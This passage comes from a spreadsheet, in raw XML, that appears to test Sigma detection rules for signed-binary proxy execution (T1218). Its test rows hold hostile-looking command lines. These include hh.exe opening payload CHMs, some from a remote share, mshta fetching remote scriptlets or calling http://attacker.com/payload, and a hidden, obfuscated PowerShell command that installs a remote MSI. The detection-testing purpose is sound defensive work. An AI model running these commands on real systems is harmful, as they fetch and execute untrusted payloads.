        </is>
      </c>
      <c r="C3230" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3230" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3230" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F3230" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3230" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3230" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3230" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3230" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3230" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3231" ht="15.75" customHeight="1" s="42">
      <c r="A3231" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3231" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3231" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3231" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3231" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F3231" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3231" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3231" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3231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31" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3231" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3232" ht="15.75" customHeight="1" s="42">
      <c r="A3232" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3232" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3232" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3232" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3232" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F3232" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3232" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3232" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3232" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3232" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3232" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3233" ht="15.75" customHeight="1" s="42">
      <c r="A3233" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3233" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3233" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3233" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3233" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F3233" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3233" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3233" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3233" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3233" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3233" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3234" ht="15.75" customHeight="1" s="42">
      <c r="A3234" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3234" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3234" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3234" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3234" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3234" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3234" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3234" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3234" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3234" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3234" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3235" ht="15.75" customHeight="1" s="42">
      <c r="A3235" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3235" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3235" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3235" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3235" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3235" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3235" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3235" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3235" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3235" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3235" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3236" ht="15.75" customHeight="1" s="42">
      <c r="A3236" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3236" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3236" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3236" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3236" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3236" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3236" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3236" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3236" s="43" t="n"/>
      <c r="J3236" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3236" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3237" ht="15.75" customHeight="1" s="42">
      <c r="A3237" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3237" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3237" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3237" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3237" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3237" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3237" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3237" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3237" s="43" t="n"/>
      <c r="J3237" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3237" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3238" ht="15.75" customHeight="1" s="42">
      <c r="A3238" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3238" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3238" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3238" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3238" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F3238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3238" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3238" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3238" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3238" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3238" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3239" ht="15.75" customHeight="1" s="42">
      <c r="A3239" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3239" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3239" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3239" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3239" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F3239" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3239" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3239" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3239" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3239" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3239" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3240" ht="15.75" customHeight="1" s="42">
      <c r="A3240" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3240" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3240" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3240" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3240" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F3240" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3240" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3240" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3240" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3240" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3240" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3241" ht="15.75" customHeight="1" s="42">
      <c r="A3241" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3241" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3241" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3241" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3241" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F3241" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3241" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3241" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3241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41" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3241" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3242" ht="15.75" customHeight="1" s="42">
      <c r="A3242" s="44" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B3242" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C3242" s="44" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D3242" s="44" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E3242" s="44" t="inlineStr">
        <is>
          <t>control.exe C:\temp\System32\malicious.cpl</t>
        </is>
      </c>
      <c r="F3242" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3242" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3242" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3242" s="44" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff)</t>
        </is>
      </c>
      <c r="J3242" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3242" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3243" ht="15.75" customHeight="1" s="42">
      <c r="A3243" s="44" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B3243" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C3243" s="44" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D3243" s="44" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E3243" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\control.exe "C:\Users\Public\Downloads\malicious.cpl "</t>
        </is>
      </c>
      <c r="F3243" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3243" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3243" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3243" s="44" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff)</t>
        </is>
      </c>
      <c r="J3243" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3243" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3244" ht="15.75" customHeight="1" s="42">
      <c r="A3244" s="44" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B3244" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C3244" s="44" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D3244" s="44" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E3244" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\control.exe C:\Users\Public\Downloads\payload.dll</t>
        </is>
      </c>
      <c r="F3244" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3244" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3244" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3244" s="44" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J3244" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3244" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3245" ht="15.75" customHeight="1" s="42">
      <c r="A3245" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B3245" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C3245" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D3245" s="44" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E3245" s="44" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=GetObject('script:h""ttps://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct)').Exec();close()</t>
        </is>
      </c>
      <c r="F3245" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3245" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3245" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3245" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J3245" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K3245" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3246" ht="15.75" customHeight="1" s="42">
      <c r="A3246" s="44" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B3246" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C3246" s="44" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D3246" s="44" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E3246" s="44" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=GetObject('script://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct)').Exec();close()</t>
        </is>
      </c>
      <c r="F3246" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3246" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3246" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3246" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J3246" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K3246" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3247" ht="15.75" customHeight="1" s="42">
      <c r="A3247" s="44" t="n"/>
      <c r="B3247" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C3247" s="44" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D3247" s="44" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E3247" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mshta.exe C:\Users\Public\Update.com &amp;&amp; C:\Users\Public\Update.com http://attacker.com/payload</t>
        </is>
      </c>
      <c r="F3247" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3247" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3247" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3247" s="4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3247" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3247" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3248" ht="15.75" customHeight="1" s="42">
      <c r="A3248" s="44" t="n"/>
      <c r="B3248" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_susp_execution</t>
        </is>
      </c>
      <c r="C3248" s="44" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions</t>
        </is>
      </c>
      <c r="D3248" s="44" t="inlineStr">
        <is>
          <t>cc7abbd0-762b-41e3-8a26-57ad50d2eea3</t>
        </is>
      </c>
      <c r="E3248" s="44" t="inlineStr">
        <is>
          <t>mshta.exe "C:\Users\Public\script.hta"</t>
        </is>
      </c>
      <c r="F3248" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3248" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3248" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3248" s="44" t="inlineStr">
        <is>
          <t>Suspicious Mshta.EXE Execution Patterns (e32f92d1-523e-49c3-9374-bdb13b46a3ba); Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J3248" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3248" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3249" ht="15.75" customHeight="1" s="42">
      <c r="A3249" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3249" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3249" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3249" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3249" s="44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49" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3249" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3249" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3249" s="44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3249" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3249" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3250" ht="15.75" customHeight="1" s="42">
      <c r="A3250" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3250" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3250" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3250" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3250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250" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3250" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3250" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3250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250" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3250" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3251" ht="15.75" customHeight="1" s="42">
      <c r="A3251" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3251" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3251" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3251" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3251" s="44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251" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3251" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3251" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3251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251" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3251" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3252" ht="15.75" customHeight="1" s="42">
      <c r="A3252" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3252" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3252" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3252" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3252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252" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3252" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3252" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3252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252" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3252" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3253" ht="15.75" customHeight="1" s="42">
      <c r="A3253" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3253" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3253" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3253" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3253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253" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3253" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3253" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I325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253" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3253" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3254" ht="15.75" customHeight="1" s="42">
      <c r="A3254" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3254" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3254" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3254" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3254" s="44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254" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3254" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3254" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3254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254" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3254" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3255" ht="15.75" customHeight="1" s="42">
      <c r="A3255" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3255" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3255" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3255" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3255" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -Command "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F3255" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3255" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3255" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3255" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J3255" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3255" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3256" ht="15.75" customHeight="1" s="42">
      <c r="A3256" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3256" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3256" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3256" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3256" s="44" t="inlineStr">
        <is>
